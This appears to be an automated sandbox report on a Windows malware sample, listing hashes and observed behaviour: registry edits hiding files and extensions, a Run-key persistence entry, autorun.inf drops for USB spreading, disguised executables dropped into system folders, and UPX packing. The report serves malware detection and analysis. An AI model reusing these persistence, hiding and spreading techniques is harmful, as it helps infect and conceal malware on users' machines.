ea3b829623e1737dfb3989ee03dd81f9b7f736f2d076dfe7e013479c574fd2e2

Analysis

max time kernel
150s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
18/10/2024, 10:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

570e4111f5338efc3bab4a01af74fb19_JaffaCakes118.exe
Size

55KB
MD5

570e4111f5338efc3bab4a01af74fb19
SHA1

78f8a839d7e051cdbe07f0d80e60ed2ac0aceccd
SHA256

ea3b829623e1737dfb3989ee03dd81f9b7f736f2d076dfe7e013479c574fd2e2
SHA512

5c0d8c71e85c1098adfe345324a7eb7ede2e032ea9ebe824e0c36b5eee19908fcd2456c26acb4eae5ebff50c8c030afcc2ff22a3b2f21b4f5cc8ba62c75c5aad
SSDEEP

1536:4BgdzBml7uiBCbgeD0MsCZtkmdUEqT+dv:4B+VmluiBCbgeDAC7XdUEI+p

Score

10^/10

discovery evasion persistence upx

Malware Config

Signatures

Modifies visibility of file extensions in Explorer 2 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found

Modifies visiblity of hidden/system files in Explorer 2 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	Process not Found

Sets file to hidden 1 TTPs 42 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
1376	attrib.exe
2976	Process not Found
2224	Process not Found
552	Process not Found
2888	Process not Found
1660	Process not Found
2416	attrib.exe
684	Process not Found
1104	Process not Found
992	Process not Found
2016	Process not Found
2068	attrib.exe
1552	attrib.exe
2668	attrib.exe
1672	Process not Found
2452	Process not Found
2324	Process not Found
1420	Process not Found
2516	attrib.exe
1380	Process not Found
3008	Process not Found
928	Process not Found
2460	Process not Found
1756	attrib.exe
2316	Process not Found
2452	Process not Found
1380	Process not Found
1444	Process not Found
2340	Process not Found
316	Process not Found
2424	attrib.exe
1256	Process not Found
2472	Process not Found
1852	Process not Found
804	attrib.exe
2860	Process not Found
1796	Process not Found
2456	Process not Found
1004	Process not Found
924	Process not Found
2880	Process not Found
2740	attrib.exe

Executes dropped EXE 5 IoCs

pid	Process
916	KGC.exe
2068	Process not Found
2604	Process not Found
2896	Process not Found
2856	Process not Found

Loads dropped DLL 6 IoCs

pid	Process
2696	cmd.exe
2696	cmd.exe
580	cmd.exe
292	Process not Found
2608	Process not Found
2740	Process not Found

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\mt = "C:\\Windows\\system32\\vaillo.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\mt = "C:\\Windows\\system32\\vaillo.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\mt = "C:\\Windows\\system32\\vaillo.exe"	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\mt = "C:\\Windows\\system32\\vaillo.exe"	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\mt = "C:\\Windows\\system32\\vaillo.exe"	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\mt = "C:\\Windows\\system32\\vaillo.exe"	Process not Found

Drops autorun.inf file 1 TTPs 26 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File opened for modification	F:\autorun.inf	Process not Found
File created	\??\c:\autorun.inf	Process not Found
File opened for modification	\??\f:\autorun.inf	cmd.exe
File created	\??\f:\autorun.inf	cmd.exe
File opened for modification	C:\autorun.inf	attrib.exe
File opened for modification	C:\autorun.inf	Process not Found
File opened for modification	F:\autorun.inf	Process not Found
File created	\??\c:\autorun.inf	Process not Found
File opened for modification	\??\c:\autorun.inf	cmd.exe
File created	\??\f:\autorun.inf	Process not Found
File created	\??\c:\autorun.inf	Process not Found
File created	\??\f:\autorun.inf	Process not Found
File created	\??\f:\autorun.inf	Process not Found
File created	\??\f:\autorun.inf	cmd.exe
File opened for modification	C:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File created	\??\f:\autorun.inf	Process not Found
File opened for modification	F:\autorun.inf	Process not Found
File opened for modification	F:\autorun.inf	Process not Found
File opened for modification	C:\autorun.inf	Process not Found
File created	\??\c:\autorun.inf	cmd.exe
File opened for modification	F:\autorun.inf	attrib.exe
File created	\??\c:\autorun.inf	cmd.exe
File created	\??\c:\autorun.inf	Process not Found
File opened for modification	C:\autorun.inf	Process not Found
File opened for modification	C:\autorun.inf	Process not Found

Drops file in System32 directory 64 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\Revo.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\Smash.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\Viva.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\God.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\Viva.exe	Process not Found
File created	C:\Windows\SysWOW64\Heaven.exe	cmd.exe
File created	C:\Windows\SysWOW64\chalie.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\chalie.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\War.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\Revo.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\War.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\Honda.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\Click.exe	cmd.exe
File created	C:\Windows\SysWOW64\Fino.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\vaillo.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\vaillo.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\steb.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\Smash.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\Fino.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\Fino.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\Revo.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\Heaven.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\Click.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\Honda.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\Smash.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\Revo.exe	Process not Found
File created	C:\Windows\SysWOW64\Click.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\Revo.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\Fino.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\Honda.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\Of.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\Of.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\Click.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\chalie.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\vaillo.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\Of.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\chalie.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\Heaven.exe	Process not Found
File created	C:\Windows\SysWOW64\vaillo.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\God.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\War.exe	cmd.exe
File created	C:\Windows\SysWOW64\steb.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\steb.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\Viva.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\War.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\steb.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\Viva.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\chalie.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\Heaven.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\Viva.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\Smash.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\Fino.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\chalie.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\Honda.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\vaillo.exe	Process not Found
File created	C:\Windows\SysWOW64\God.exe	cmd.exe
File created	C:\Windows\SysWOW64\Honda.exe	cmd.exe
File created	C:\Windows\SysWOW64\Smash.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\Smash.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\War.exe	Process not Found
File opened for modification	C:\Windows\SysWOW64\vaillo.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\Honda.exe	cmd.exe
File created	C:\Windows\SysWOW64\Viva.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\Heaven.exe	Process not Found

UPX packed file 15 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1580-2-0x0000000000400000-0x000000000042A000-memory.dmp	upx
behavioral1/files/0x0008000000016f02-8.dat	upx
behavioral1/memory/1580-124-0x0000000000400000-0x000000000042A000-memory.dmp	upx
behavioral1/memory/2696-137-0x0000000000170000-0x000000000019A000-memory.dmp	upx
behavioral1/memory/916-145-0x0000000000400000-0x000000000042A000-memory.dmp	upx
behavioral1/memory/1580-143-0x0000000000400000-0x000000000042A000-memory.dmp	upx
behavioral1/memory/916-262-0x0000000000400000-0x000000000042A000-memory.dmp	upx
behavioral1/memory/916-304-0x0000000000400000-0x000000000042A000-memory.dmp	upx
behavioral1/memory/2068-381-0x0000000000400000-0x000000000042A000-memory.dmp	upx
behavioral1/memory/2604-410-0x0000000000400000-0x000000000042A000-memory.dmp	upx
behavioral1/memory/2068-412-0x0000000000400000-0x000000000042A000-memory.dmp	upx
behavioral1/memory/2896-521-0x0000000000400000-0x000000000042A000-memory.dmp	upx
behavioral1/memory/2604-520-0x0000000000400000-0x000000000042A000-memory.dmp	upx
behavioral1/memory/2856-626-0x0000000000400000-0x000000000042A000-memory.dmp	upx
behavioral1/memory/2896-625-0x0000000000400000-0x000000000042A000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_zh_4.4.0.v20140623020002.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_zh_CN.jar	Process not Found
File opened for modification	C:\Program Files\Java\jre7\lib\ext\dnsns.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector_1.0.200.v20131115-1210.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_de_DE.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-core_visualvm.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_zh_4.4.0.v20140623020002.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.contexts_1.3.100.v20140407-1019.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper_1.0.400.v20130327-1442.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_zh_CN.jar	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyclient.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.configuration_5.5.0.165303.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_zh_CN.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.servlet_1.1.500.v20140318-1755.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_zh_CN.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_ja_4.4.0.v20140623020002.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-charts.jar	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_zh_CN.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_ja.jar	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_ja.jar	Process not Found
File opened for modification	C:\Program Files\Java\jre7\lib\ext\localedata.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\management-agent.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_zh_CN.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_zh_CN.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_ja_4.4.0.v20140623020002.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\jce.jar	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-impl.jar	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-masterfs.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_zh_4.4.0.v20140623020002.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_zh_CN.jar	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro_3.4.200.v20130326-1254.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_zh_CN.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-attach.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_zh_CN.jar	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director_2.3.100.v20140224-1921.jar	Process not Found
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\access\libbluray-j2se-1.3.2.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_zh_CN.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-print.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_zh_CN.jar	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_zh_4.4.0.v20140623020002.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_ja_4.4.0.v20140623020002.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\core_zh_CN.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\tools.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_ja.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\sa-jdi.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.zh_CN_5.5.0.165303.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox_1.0.500.v20131211-1531.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_zh_CN.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core_2.3.0.v20131211-1531.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net_1.2.200.v20120807-0927.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator_1.1.0.v20131217-1203.jar	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_ja.jar	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-fallback.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_zh_4.4.0.v20140623020002.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_zh_CN.jar	Process not Found
File opened for modification	C:\Program Files\Java\jre7\lib\alt-rt.jar	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_ja_4.4.0.v20140623020002.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_ja.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_ja_4.4.0.v20140623020002.jar	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_ja.jar	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_ja.jar	Process not Found

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\suck.exe	Process not Found
File opened for modification	C:\Windows\Kenel32.exe	Process not Found
File created	C:\Windows\system32.exe	cmd.exe
File opened for modification	C:\Windows\taskes.exe	cmd.exe
File opened for modification	C:\Windows\Web\Wallpapers.exe	Process not Found
File created	C:\Windows\System\driber.exe	cmd.exe
File opened for modification	C:\Windows\system\drver.cab.sys	cmd.exe
File opened for modification	C:\Windows\Media\soundsman.exe	cmd.exe
File opened for modification	C:\Windows\freesex.exe	cmd.exe
File opened for modification	C:\Windows\system32.exe	cmd.exe
File opened for modification	C:\Windows\Web\Wallpapers.exe	Process not Found
File opened for modification	C:\Windows\Web\Wallpapers.exe	Process not Found
File created	C:\Windows\freesex.exe	cmd.exe
File opened for modification	C:\Windows\Web\GameKhmer.exe	cmd.exe
File opened for modification	C:\Windows\system32.exe	cmd.exe
File created	C:\Windows\taskes.exe	cmd.exe
File opened for modification	C:\Windows\System\driber.exe	cmd.exe
File opened for modification	C:\Windows\system32.exe	Process not Found
File opened for modification	C:\Windows\Web\Wallpapers.exe	Process not Found
File created	C:\Windows\Kenel32.exe	cmd.exe
File opened for modification	C:\Windows\Kenel32.exe	cmd.exe
File opened for modification	C:\Windows\suck.exe	cmd.exe
File opened for modification	C:\Windows\System\driber.exe	Process not Found
File opened for modification	C:\Windows\Fonts\limons.ttf	Process not Found
File opened for modification	C:\Windows\Fonts\limons.ttf	Process not Found
File opened for modification	C:\Windows\Web\GameKhmer.exe	Process not Found
File opened for modification	C:\Windows\freesex.exe	cmd.exe
File created	C:\Windows\Media\soundsman.exe	cmd.exe
File created	C:\Windows\Fonts\limons.ttf	cmd.exe
File opened for modification	C:\Windows\Fonts\limons.ttf	Process not Found
File opened for modification	C:\Windows\Fonts\limons.ttf	Process not Found
File opened for modification	C:\Windows\System\driber.exe	Process not Found
File opened for modification	C:\Windows\Web\GameKhmer.exe	Process not Found
File opened for modification	C:\Windows\Kenel32.exe	Process not Found
File opened for modification	C:\Windows\suck.exe	Process not Found
File opened for modification	C:\Windows\suck.exe	Process not Found
File opened for modification	C:\Windows\System\driber.exe	Process not Found
File created	C:\Windows\Web\GameKhmer.exe	cmd.exe
File opened for modification	C:\Windows\Fonts\limons.ttf	cmd.exe
File opened for modification	C:\Windows\freesex.exe	Process not Found
File opened for modification	C:\Windows\taskes.exe	Process not Found
File opened for modification	C:\Windows\suck.exe	cmd.exe
File opened for modification	C:\Windows\Media\soundsman.exe	cmd.exe
File opened for modification	C:\Windows\system32.exe	Process not Found
File opened for modification	C:\Windows\Media\soundsman.exe	Process not Found
File opened for modification	C:\Windows\Help\KGC.exe	cmd.exe
File created	C:\Windows\suck.exe	cmd.exe
File opened for modification	C:\Windows\Kenel32.exe	Process not Found
File opened for modification	C:\Windows\Media\soundsman.exe	Process not Found
File opened for modification	C:\Windows\system32.exe	Process not Found
File opened for modification	C:\Windows\Kenel32.exe	Process not Found
File opened for modification	C:\Windows\freesex.exe	Process not Found
File opened for modification	C:\Windows\Kenel32.exe	cmd.exe
File opened for modification	C:\Windows\Web\GameKhmer.exe	cmd.exe
File opened for modification	C:\Windows\taskes.exe	cmd.exe
File opened for modification	C:\Windows\system32.exe	Process not Found
File opened for modification	C:\Windows\Web\GameKhmer.exe	Process not Found
File created	C:\Windows\Help\KGC.exe	cmd.exe
File opened for modification	C:\Windows\Web\Wallpapers.exe	cmd.exe
File opened for modification	C:\Windows\taskes.exe	Process not Found
File opened for modification	C:\Windows\suck.exe	Process not Found
File opened for modification	C:\Windows\Web\GameKhmer.exe	Process not Found
File created	C:\Windows\Web\Wallpapers.exe	cmd.exe
File opened for modification	C:\Windows\Web\Wallpapers.exe	cmd.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
